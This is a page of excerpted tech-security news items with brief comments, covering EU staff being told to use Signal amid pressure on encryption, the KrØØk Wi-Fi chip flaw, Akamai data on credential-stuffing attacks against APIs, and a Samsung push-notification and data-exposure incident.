Promoting the app, however, could antagonize the law enforcement community.

Officials in Brussels, Washington and other capitals have been putting strong pressure on Facebook and Apple to allow government agencies to access to encrypted messages; if these agencies refuse, legal requirements could be introduced that force firms to do just that.

American, British and Australian officials have published an open letter to Facebook CEO Mark Zuckerberg in October, asking that he call off plans to encrypt the company’s messaging service. Dutch Minister for Justice and Security Ferd Grappehaus told POLITICO last April that the EU needs to look into legislation allowing governments to access encrypted data.

Cybersecurity officials have dismissed calls to weaken encryption for decades, arguing that it would put the confidentiality of communications at risk across the board.

Source: EU Commission to staff: Switch to Signal messaging app – POLITICO

Finally, an organisation showing some sense!

A billion-plus computers, phones, and other devices are said to suffer a chip-level security vulnerability that can be exploited by nearby miscreants to snoop on victims’ encrypted Wi-Fi traffic.

The flaw [PDF] was branded KrØØk by the bods at Euro infosec outfit ESET who discovered it. The design blunder is otherwise known as CVE-2019-15126, and is related to 2017’s KRACK technique for spying on Wi-Fi networks.

An eavesdropper doesn’t have to be logged into the target device’s wireless network to exploit KrØØk. If successful, the miscreant can take repeated snapshots of the device’s wireless traffic as if it were on an open and insecure Wi-Fi. These snapshots may contain things like URLs of requested websites, personal information in transit, and so on.

It’s not something to be totally freaking out over: someone exploiting this has to be physically near you, and you may notice your Wi-Fi being disrupted. But it’s worth knowing about.

Source: Wi-Fi of more than a billion PCs, phones, gadgets can be snooped on. But you’re using HTTPS, SSH, VPNs… right? • The Register

Automating connections from 3rd party providers makes it easy to access your financial data because people re-use their logins and these logins have been repeatedly leaked online.

New data from security and content delivery company Akamai shows that one in every five attempts to gain unauthorized access to user accounts is now done through application programming interfaces (APIs) instead of user-facing login pages. This trend is even more pronounced in the financial services industry where the use of APIs is widespread and in part fueled by regulatory requirements.

According to a report released today, between December 2017 and November 2019, Akamai observed 85.4 billion credential abuse attacks against companies worldwide that use its services. Of those attacks, around 16.5 billion, or nearly 20%, targeted hostnames that were clearly identified as API endpoints. However, in the financial industry, the percentage of attacks that targeted APIs rose sharply between May and September 2019, at times reaching 75%.

“API usage and widespread adoption have enabled criminals to automate their attacks,” the company said in its report. “This is why the volume of credential stuffing incidents has continued to grow year over year, and why such attacks remain a steady and constant risk across all market segments.”

The credential stuffing problem

Credential stuffing, a type of brute-force attack where criminals use lists of leaked username and password combinations to gain access to accounts, has become a major problem in recent years. This is a consequence of the large number of data breaches over the past decade that have resulted in billions of stolen credentials being released publicly on the internet or sold on underground markets as commodities.

Knowing that users reuse passwords across various websites, attackers have used the credentials exposed in data breaches to build so-called combo lists. These lists of username and password combinations are then loaded into botnets or automated tools and are used to flood websites with login requests in an attempt to gain access.

However, once access is gained, extracting information from the affected services by crawling the customer pages requires some effort and customization, whereas requesting and extracting information through APIs is standardized and well suited for automation. After all, the very purpose of an API is to facilitate applications talking to each other and exchanging data automatically.

Source: APIs are becoming a major target for credential stuffing attacks

In the early hours of this morning, a very large number of Samsung devices around the world received a push notification from the vendor’s Find my Mobile app. That notification simply read “1/1”.

[…]

A handful of Reg staffers also received the notification, which caused surprise and concern at Vulture Central – not least because Find my Mobile is disabled on two of those devices.

A pre-installed default Samsung OEM app regarded by some as bloatware, Find my Mobile cannot be fully uninstalled if you don’t plan to format the entire phone with a new third-party ROM – which is a profoundly technical process, and, with modern Samsung devices, requires the user to unlock the bootloader.

[…]

Ominously, some Register readers who received the unwanted notification immediately assumed the worst and went into their accounts to change their Samsung passwords only to be confronted by other people’s personal data on the Samsung UK website.

One told us that after seeing other people’s names, addresses and phone numbers displayed in his Samsung Account after logging in using his own details, he phoned the Samsung helpdesk. Our reader said: “When I explained to [the call centre worker] what I saw, he said, ‘Yes, we’ve had a few reports of that this morning’.”

Mark showed us screenshots he had taken, showing himself logged in and someone else’s details being displayed as if they were associated with his account.

Source: All that Samsung users found on UK website after weird Find my Mobile push notification was… other people’s details • The Register